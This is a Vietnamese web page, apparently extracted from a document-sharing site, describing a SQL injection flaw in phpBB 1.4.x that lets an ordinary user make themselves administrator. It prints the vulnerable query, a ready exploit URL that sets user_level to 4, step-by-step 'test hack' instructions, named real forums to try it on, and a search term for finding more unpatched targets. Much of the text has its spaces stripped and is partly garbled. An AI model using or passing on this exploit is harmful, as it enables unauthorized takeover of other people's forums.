Lỗi trong phpBB 1.4.x có phép đoạt quyền Admin

Các forum phpBB 1.4.x có một lỗi rất nghiêm trọng cho phép một user bình thường có thể chạyđoạn lệnh cho phép cập nhật vài thông tin trong preferences để có được quyền admin.Một trong số lỗi được tìm thấy trong đoạn code sau...
Nội dung trích xuất từ tài liệu:
Lỗi trong phpBB 1.4.x có phép đoạt quyền AdminLỗitrongphpBB1.4.xcóphépđoạtquyềnAdmin:trangnàyđãđượcđọc lầnCácforumphpBB1.4.xcómộtlỗirấtnghiêmtrọngchophépmộtuserbìnhthườngcóthểchạyđoạnlệnhchophépcậpnhậtvàithôngtintrongpreferencesđểcóđượcquyềnadmin.Mộttrongsốlỗiđượctìmthấytrongđoạncodesau:$sql=UPDATEusersSETuser_viewemail=$viewemail,user_theme=$themes,user_attachsig=$sig,user_desmile=$smile,user_html=$dishtml,user_bbcode=$disbbcode,user_lang=$langWHERE(user_id=$userdata[user_id];Đểkhaithác,tachạylệnhmodifypreferecestrongfileprefx.php,b ằngcáchxácđịnhmộtgiátrịcụthểchobiếnviewemail.Vdsausẽđặtchomộtusernamemaxxcóquyềnadmin(privilegelevel4):http://sitename/phpBBfolder/prefs.php?save=1&viewemail=1,user_level%3D4%20where%20username%3Dmaxx%23Lệnhnàysẽchạylệnhsqlcậpnhậtthôngtinvềviewemailđồngthờicảuser_level.Nhưvậy,cácbướccầnthiếtđểthửtesthackmộtforumdạngnàynhưsau:Đăngkí1accLoginvàovớiaccvừađăngkíChạylinkởvdtrênNếuthiếtlậppreferencesthànhcông(kobáolỗi),bạnreturnlạiforumindexvàvàoAdministrationPanelởcuốiforum.Lưuýcómộtvàiforumsaukhisetpreferencesthànhcông,vẫnkothấyAdministrationPanel,bạncóthểthửvàotheolinksau:/phpBBfolder/admin/index.php(nhưforumpregnancy.orgởdưới)Mộtvàiforumthửnghiệm:http://tuxedox2.dyndns.org/phpBB/index.php http://www.pregnancy.org/phpBB/index.phphttp://webraovat.com/phpBB/CácbạncóthểtìmthêmcácforumphpBB1.4.xchưafixtrênnet,searchtheotừkhóavídụnhư:poweredphpbb1.4.0